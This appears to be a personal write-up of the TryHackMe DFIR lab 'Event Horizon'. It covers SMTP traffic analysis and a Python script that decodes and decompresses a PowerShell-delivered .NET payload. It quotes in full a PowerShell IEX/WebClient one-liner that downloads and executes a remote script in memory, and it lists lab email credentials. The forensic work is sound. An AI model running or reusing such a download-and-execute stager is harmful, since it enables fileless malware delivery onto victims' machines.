← ./home
root@eventhorizon:~/thm#
SESSION ACTIVE

thm log

EVENT HORIZONTryHackMe · DFIR

PLATFORM TryHackMe ROOM Event Horizon CATEGORY DFIR
thm dfir powershell smtp
▼ scroll to begin
┌──(operator@kali)-[~/writeup] └─$ cat 01_investigation.md

investigation notes

filterd for smtp and followed a tcp stream i found a base64 at the end that had a powershell command one liner IEX(New-Object Net.WebClient).downloadString('http://10.0.2.45/radius.ps1') The command creates a Net.WebClient(used to send and receive data using http). The command downloads the contents of radius.ps1 being served in attacker's ip 10.0.2.45. It executes the downloaded data in memory using IEX(Invoke Expression)-the script is never saved in disk it executes after being downloaded.

tom.dom@eventhorizon.thm:password dom.mark@eventhorizon.thm

image
image
image

script.py reads the powershell file, extracts base64 blob, decodes it from base64, decompresses it(deflate), saves the raw .NET assembly(DLL/EXE) to disk so it can be inspected
virustotal.com

image
image
┌──(operator@kali)-[~/writeup] └─$ cat 02_script.py

supporting script

import re
import base64
import zlib

# Path to your radius.ps1
ps1_file = "radius.ps1"

# Read the file
with open(ps1_file, "r", encoding="utf-8") as f:
    content = f.read()

# Step 1: Extract the Base64 string inside [Convert]::FromBase64String('...')
match = re.search(r"FromBase64String\('([^']+)'\)", content)
if not match:
    raise ValueError("Base64 string not found in PowerShell script.")
b64_data = match.group(1)

# Step 2: Decode from Base64
compressed_data = base64.b64decode(b64_data)

# Step 3: Decompress (Deflate)
# In .NET DeflateStream = raw zlib DEFLATE without zlib headers in some cases.
# The 'wbits=-15' tells zlib to expect raw DEFLATE data.
decompressed_data = zlib.decompress(compressed_data, wbits=-15)

# Step 4: Save the decompressed .NET assembly to disk
output_file = "radius_payload.exe"
with open(output_file, "wb") as f:
    f.write(decompressed_data)

print(f"[+] Extracted payload saved to {output_file}")